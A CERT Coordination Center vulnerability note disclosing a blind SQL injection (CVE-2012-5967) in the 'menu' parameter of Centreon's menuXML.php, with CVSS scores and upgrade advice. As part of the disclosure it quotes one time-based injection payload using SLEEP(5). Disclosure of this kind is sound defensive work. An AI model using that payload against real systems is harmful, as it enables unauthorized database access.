search menu icon-carat-right cmu-wordmark

CERT Coordination Center

Centreon 2.3.3 through 2.3.9-4 blind sqli injection vulnerability.

Vulnerability Note VU#856892

Original Release Date: 2012-12-12 | Last Revised: 2012-12-12


Centreon 2.3.3 through 2.3.9-4 contains a blind sql injection vulnerability.


CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Centreon 2.3.3 through 2.3.9-4 contains a blind sql injection vulnerability. The vulnerability is found within the menuXML.php file inside the 'menu' parameter. It was reported that by injecting a payload after the menu parameter, for example '  AND SLEEP(5) AND 'meHL'='meHL, the web application hung for 5 seconds.


A remote authenticated attacker may be able to run a subset of SQL commands against the back-end database.



The vendor has stated that this vulnerability has been addressed in Centreon 2.4.0. Users are advised to update to Centreon 2.4.0 or newer.

Restrict access

As a general good security practice, only allow connections from trusted hosts and networks. Note that restricting access does not prevent SQLi attacks since the attack comes as an SQL request from a legitimate user's host. Restricting access would prevent an attacker from accessing a web interface using stolen credentials from a blocked network location.

Vendor Information

Affected   Unknown   Unaffected


Notified:  November 09, 2012 Updated:  December 07, 2012



Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

CVSS Metrics

Group Score Vector
Base 6.3 AV:N/AC:M/Au:S/C:C/I:N/A:N
Temporal 4.8 E:U/RL:U/RC:UC
Environmental 1.3 CDP:L/TD:L/CR:ND/IR:ND/AR:ND



Thanks to Tom Gregory of Spentera for reporting this vulnerability.

This document was written by Michael Orlando.

Other Information

CVE IDs: CVE-2012-5967
Date Public: 2012-12-12
Date First Published: 2012-12-12
Date Last Updated: 2012-12-12 12:37 UTC
Document Revision: 10

Sponsored by the Department of Homeland Security Office of Cybersecurity and Communications.